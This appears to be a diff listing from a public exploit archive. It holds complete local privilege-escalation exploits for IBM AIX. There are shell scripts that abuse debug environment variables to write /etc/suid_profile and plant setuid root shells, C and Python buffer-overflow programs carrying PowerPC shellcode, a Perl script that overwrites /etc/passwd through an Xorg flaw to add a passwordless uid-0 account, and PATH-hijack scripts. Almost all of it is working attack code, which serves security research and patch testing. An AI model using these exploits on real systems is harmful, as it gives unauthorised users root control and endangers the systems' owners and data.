/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -e "$ROOTSHELL" ]; then
echo "[-] Rootshell does not exist and exploit failed."
exit 1
fi
echo "[*] Executing rootshell"
$ROOTSHELL
echo "[*] Make sure to remove $ROOTSHELL"

131
exploits/aix/local/40710.sh Executable file
View file

@ -0,0 +1,131 @@
#!/usr/bin/sh
#
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
#
# This exploit takes advantage of known issues with debugging functions
# within the AIX linker library. We are taking advantage of known
# functionality, and focusing on badly coded SUID binaries which do not
# adhere to proper security checks prior to seteuid/open/writes.
#
# The CVEs we will be taking advantage of:
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
# local users to create or overwrite arbitrary files via a symlink attack on
# the log file associated with the MALLOCDEBUG environment variable.
#
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does
# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE
# environment variables, which allows local users to gain privileges by
# leveraging a setuid-root program to create an arbitrary root-owned file
# with world-writable permissions, related to libC.a (aka the XL C++ runtime
# library) in AIX 5.3 and libc.a in AIX 6.1.
#
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary
# File Writes In IBM AIX.
#
# In each instance of the aforementioned CVEs, IBM merely patched the binaries
# which were reported in the original reports as being used for escalation of
# the vulnerabilities. This allowed for the lquerylv binary to slip by their
# patches and become an attack vector.
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#
# lqueryroot.sh by @hxmonsegur [2016 //RSL]
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
APP=$0
function usage
{
echo "Usage: $APP [1] | [2] | [3]"
echo
echo "1 - MALLOCDEBUG file write -> escalation"
echo "2 - _LIB_INIT_DBG_FILE file write -> escalation"
echo "3 - MALLOCBUCKETS file write -> escalation"
echo
echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL"
exit
}
function CVE20091786
{
echo "[*] Exporting MALLOCDEBUG environment variable"
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/etc/suid_profile
export MALLOCTYPE MALLOCDEBUG
}
function CVE20092669
{
echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable"
_LIB_INIT_DBG=1
_LIB_INIT_DBG_FILE=/etc/suid_profile
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
}
function CVE20143074
{
echo "[*] Exporting MALLOCBUCKETS environment variable"
MALLOCOPTIONS=buckets
MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile
export MALLOCOPTIONS MALLOCBUCKETS
}
if [ -z "$1" ]; then
usage
exit 1
fi
while [ "$1" != "" ]; do
case $1 in
1 ) CVE20091786;;
2 ) CVE20092669;;
3 ) CVE20143074;;
* ) usage
break;;
esac
shift
done
if [ ! -x "/usr/sbin/lquerylv" ]; then
echo "[-] lquerylv isn't executable. Tough luck."
exit 1
fi
echo "[*] Setting umask to 000"
umask 000
echo "[*] Execute our vulnerable binary"
/usr/sbin/lquerylv >/dev/null 2>&1
if [ ! -e "/etc/suid_profile" ]; then
echo "[-] /etc/suid_profile does not exist and exploit failed."
exit 1
fi
echo "[*] Cleaning up /etc/suid_profile"
echo > /etc/suid_profile
echo "[*] Current id: `/usr/bin/id`"
echo "[*] Adding payload"
cat << EOF >/etc/suid_profile
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm /etc/suid_profile
EOF
echo "[*] Unsetting env"
unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE
echo "[*] Executing ibstat for fun and profit"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -e "$ROOTSHELL" ]; then
echo "[-] Rootshell does not exist and exploit failed."
exit 1
fi
echo "[*] Executing rootshell"
$ROOTSHELL

94
exploits/aix/local/40950.sh Executable file
View file

@ -0,0 +1,94 @@
#!/usr/bin/sh
#
# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root
#
# Affected versions:
# AIX 6.1, 7.1, 7.2
# VIOS 2.2.x
#
# Fileset Lower Level Upper Level KEY
# ---------------------------------------------------------
# bos.net.tcp.client 6.1.9.0 6.1.9.200 key_w_fs
# bos.net.tcp.client 7.1.3.0 7.1.3.47 key_w_fs
# bos.net.tcp.client 7.1.4.0 7.1.4.30 key_w_fs
# bos.net.tcp.client_core 7.2.0.0 7.2.0.1 key_w_fs
# bos.net.tcp.client_core 7.2.1.0 7.2.1.0 key_w_fs
#
# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc
# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/
# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
VULNBIN=/usr/bin/bellmail
SUIDPROFILE=/etc/suid_profile
function ESCALATE
{
echo "[*] Preparing escalation"
$VULNBIN >/dev/null 2>&1 <<EOD
s /etc/suid_profile
EOD
if [ ! -w $SUIDPROFILE ]; then
echo "[-] $SUIDPROFILE is not writable. Exploit failed."
exit 1
fi
echo "[*] Clearing out $SUIDPROFILE"
echo > /etc/suid_profile
echo "[*] Injecting payload"
cat << EOF >$SUIDPROFILE
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm -f $SUIDPROFILE
EOF
echo "[*] Executing SUID to leverage privileges"
/usr/bin/ibstat -a >/dev/null 2>&1
if [ ! -x $ROOTSHELL ]; then
echo "[-] Root shell does not exist or is not executable. Exploit failed."
exit 1
fi
echo "[*] Escalating to root.."
$ROOTSHELL
echo "[*] Make sure to remove $ROOTSHELL"
}
echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"
$VULNBIN -e
if [ $? -eq 0 ]
then
ESCALATE
echo "[*] Make sure to remove $ROOTSHELL"
exit 0
fi
echo "[*] Sending mail to non-existent user, force a bounce within ~minute"
/usr/bin/mail nonexistentuser <<EOD
.
.
.
EOD
echo "[*] Waiting for mail to come in."
while true
do
$VULNBIN -e
if [ $? -eq 0 ]
then
echo "[*] Mail found"
ESCALATE
break
else
echo "[-] Mail not received yet. Sleeping."
sleep 10
fi
done

178
exploits/aix/local/4231.c Normal file
View file

@ -0,0 +1,178 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX capture Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs);
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]

29
exploits/aix/local/4232.sh Executable file
View file

@ -0,0 +1,29 @@
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]

157
exploits/aix/local/4233.c Normal file
View file

@ -0,0 +1,157 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX ftp Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/ftp"
#define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}
printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}
addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);
fflush(stdout);
fflush(stderr);
close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]

141
exploits/aix/local/45938.pl Executable file
View file

@ -0,0 +1,141 @@
# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
# Build Operating System: AIX IBM
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
# Build Date: 07 July 2006
# Before reporting problems, check http://wiki.x.org
# to make sure that you have the latest version.
# Module Loader present
# $ id
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=0(root) gid=0(system)
# # whoami
# root
#!/usr/bin/perl
print "[+] AIX X11 server local root exploit\n";
# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg = `command -v Xorg`);
if ($xorg eq ""){
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
exit;
}
# Check ksh93 is in path
chomp($ksh = `command -v ksh93`);
if ($ksh eq ""){
print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
exit;
}
# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array = <$passwd_fh>);
close($passwd_fh);
# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users = `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd = '';
foreach my $user (@users)
{
$user .= ":";
foreach my $line (@passwd_array)
{
if (index($line, $user) == 0) {
$users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line;
}
}
}
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log
print "[-] Generating Xorg command \n";
$blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';
print "[-] Opening /tmp/wow.ksh \n";
open($fr, '>', "/tmp/wow.ksh");
# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;
# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
# Make script executable and run it
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");
# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";

27
exploits/aix/local/4612.py Executable file
View file

@ -0,0 +1,27 @@
#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254 )
#thomas.pollet@gmail.com
#
from os import execve
bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f"
egg="\x60"*2350
shellcode=( # by intropy <at> caughq.org
"\x7c\xa5\x2a\x79" # xor. r5,r5,r5
"\x40\x82\xff\xfd" # bnel <shellcode>
"\x7f\xe8\x02\xa6" # mflr r31
"\x3b\xff\x01\x20" # cal r31,0x120(r31)
"\x38\x7f\xff\x08" # cal r3,-248(r31)
"\x38\x9f\xff\x10" # cal r4,-240(r31)
"\x90\x7f\xff\x10" # st r3,-240(r31)
"\x90\xbf\xff\x14" # st r5,-236(r31)
"\x88\x5f\xff\x0f" # lbz r2,-241(r31)
"\x98\xbf\xff\x0f" # stb r5,-241(r31)
"\x4c\xc6\x33\x42" # crorc cr6,cr6,cr6
"\x44\xff\xff\x02" # svca
"/bin/sh"
"\x05")
execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})
# milw0rm.com [2007-11-07]

72
exploits/aix/local/699.c Normal file
View file

@ -0,0 +1,72 @@
/* exploit for /usr/bin/paginit
tested on: AIX 5.2
if the exploit fails it's because the shellcode
ends up at a different address. use dbx to check,
and change RETADDR accordingly.
cees-bart <ceesb cs ru nl>
*/
#define RETADDR 0x2ff22c90
char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;
char envlabel[] = "X=";
void printint(char* buf, int x) {
buf[0] = x >> 24;
buf[1] = (x >> 16) & 0xff;
buf[2] = (x >> 8) & 0xff;
buf[3] = x & 0xff;
}
int main(int argc, char **argv) {
char *env[3];
char code[1000];
char buf[8000];
char *p, *i;
int offset1 = 0;
offset1 = 0; // atoi(argv[1]);
memset(code, 'C', sizeof(code));
memcpy(code, envlabel,sizeof(envlabel)-1);
// landingzone
for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
printint(i, 0x7ca52a79);
memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
code[sizeof(code)-1] = 0;
env[0] = code;
env[1] = 0;
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf)-1] = 0;
p = buf;
p += 4114;
printint(p,RETADDR); // try to hit the landingzone
p += 72;
printint(p, RETADDR); // any readable address (apparently not overwritten)
execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}
// milw0rm.com [2004-12-20]

13
exploits/aix/local/701.sh Executable file
View file

@ -0,0 +1,13 @@
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh
# milw0rm.com [2004-12-21]

25
exploits/aix/local/898.sh Executable file
View file

@ -0,0 +1,25 @@
#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit
cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
# milw0rm.com [2005-03-25]

33
exploits/aix/local/9306.sh Executable file
View file

@ -0,0 +1,33 @@
#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################
Set the following environment variables:
umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30]

90
exploits/aix/local/9645.sh Executable file
View file

@ -0,0 +1,90 @@
#!/bin/sh
#
# $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $
#
# raptor_libC - AIX arbitrary file overwrite via libC debug
# Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
#
# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle
# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which
# allows local users to gain privileges by leveraging a setuid-root program to
# create an arbitrary root-owned file with world-writable permissions, related
# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1
# (CVE-2009-2669).
#
# Typical privilege escalation techniques via arbitrary file creation don't
# seem to work on recent AIX versions: .rhosts is ignored if it is group or
# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries;
# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's
# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come
# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys,
# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.
#
# See also: http://milw0rm.com/exploits/9306
#
# Usage:
# $ uname -a
# AIX rs6000 3 5 0052288E4C00
# $ lslpp -L xlC.rte | grep xlC.rte
# xlC.rte 9.0.0.1 C F XL C/C++ Runtime
# $ chmod +x raptor_libC
# $ ./raptor_libC /bin/bobobobobob
# [...]
# -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob
#
# Vulnerable platforms (AIX 5.3):
# xlC.rte < 8.0.0.0 [untested]
# xlC.rte 8.0.0.0-8.0.0.14 [untested]
# xlC.rte 9.0.0.0-9.0.0.9 [tested]
# xlC.rte 10.1.0.0-10.1.0.2 [untested]
#
# Vulnerable platforms (AIX 6.1):
# bos.rte.libc 6.1.0.0-6.1.0.11 [untested]
# bos.rte.libc 6.1.1.0-6.1.1.6 [untested]
# bos.rte.libc 6.1.2.0-6.1.2.5 [untested]
# bos.rte.libc 6.1.3.0-6.1.3.2 [untested]
# bos.adt.prof 6.1.0.0-6.1.0.10 [untested]
# bos.adt.prof 6.1.1.0-6.1.1.5 [untested]
# bos.adt.prof 6.1.2.0-6.1.2.4 [untested]
# bos.adt.prof 6.1.3.0-6.1.3.1 [untested]
#
echo "raptor_libC - AIX arbitrary file overwrite via libC debug"
echo "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>"
echo
# check the arguments
if [ -z "$1" ]; then
echo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***"
echo
echo "Usage: $0 <filename>"
echo
exit
fi
# prepare the environment
_LIB_INIT_DBG=1
_LIB_INIT_DBG_FILE=$1
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE
# gimme -rw-rw-rw-!
umask 0
# setuid program linked to /usr/lib/libC.a
/usr/dt/bin/dtappgather
# other good setuid targets
# /usr/dt/bin/dtprintinfo
# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey
# check the created file
ls -l $_LIB_INIT_DBG_FILE
echo
# milw0rm.com [2009-09-11]

116
exploits/aix/remote/14407.c Normal file
View file

@ -0,0 +1,116 @@
/*************************************************************************
* Check Point Software Technologies - Vulnerability Discovery Team (VDT) *
* Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com> *
* *
* rpc.pcnfsd syslog format string vulnerability *
*************************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#define PCNFSD_PROG 150001
#define PCNFSD_VERS 1
#define PCNFSD_PR_INIT 2
#define PCNFSD_PR_START 3
struct cm_send {
char *s1;
char *s2;
};
struct cm_send2 {
char *s1;
char *s2;
};
struct cm_reply {
int i;
};
bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
